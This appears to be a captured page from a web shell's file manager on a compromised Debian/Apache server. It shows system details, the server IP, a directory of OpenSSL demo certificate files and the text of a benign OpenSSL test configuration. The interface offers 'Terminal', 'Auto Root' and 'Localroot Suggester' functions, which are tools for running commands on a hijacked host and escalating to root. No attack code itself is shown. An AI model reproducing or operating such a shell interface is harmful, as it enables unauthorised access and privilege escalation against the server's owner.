Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.122
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
libssl-doc /
demos /
certs /
apps /
Delete
Unzip
Name
Size
Permission
Date
Action
apps.cnf
1.75
KB
-rw-r--r--
2019-09-10 15:16
ckey.pem
1.64
KB
-rw-r--r--
2019-09-10 15:16
intkey.pem
1.64
KB
-rw-r--r--
2019-09-10 15:16
mkacerts.sh
1.82
KB
-rw-r--r--
2019-09-10 15:16
mkxcerts.sh
1.09
KB
-rw-r--r--
2019-09-10 15:16
rootkey.pem
1.64
KB
-rw-r--r--
2019-09-10 15:16
skey.pem
1.64
KB
-rw-r--r--
2019-09-10 15:16
skey2.pem
1.64
KB
-rw-r--r--
2019-09-10 15:16
Save
Rename
# # OpenSSL configuration file to create apps directory certificates # # This definition stops the following lines choking if HOME or CN # is undefined. HOME = . RANDFILE = $ENV::HOME/.rnd CN = "Not Defined" #################################################################### [ req ] default_bits = 2048 default_keyfile = privkey.pem # Don't prompt for fields: use those in section directly prompt = no distinguished_name = req_distinguished_name x509_extensions = v3_ca # The extensions to add to the self signed cert string_mask = utf8only # req_extensions = v3_req # The extensions to add to a certificate request [ req_distinguished_name ] countryName = UK organizationName = OpenSSL Group organizationalUnitName = FOR TESTING PURPOSES ONLY # Take CN from environment so it can come from a script. commonName = $ENV::CN [ usr_cert ] # These extensions are added when 'ca' signs a request for an end entity # certificate basicConstraints=critical, CA:FALSE keyUsage=critical, nonRepudiation, digitalSignature, keyEncipherment # This will be displayed in Netscape's comment listbox. nsComment = "OpenSSL Generated Certificate" [ ec_cert ] # These extensions are added when 'ca' signs a request for an end entity # certificate basicConstraints=critical, CA:FALSE keyUsage=critical, nonRepudiation, digitalSignature, keyAgreement # This will be displayed in Netscape's comment listbox. nsComment = "OpenSSL Generated Certificate" # PKIX recommendations harmless if included in all certificates. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid [ v3_ca ] # Extensions for a typical CA # PKIX recommendation. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid:always basicConstraints = critical,CA:true keyUsage = critical, cRLSign, keyCertSign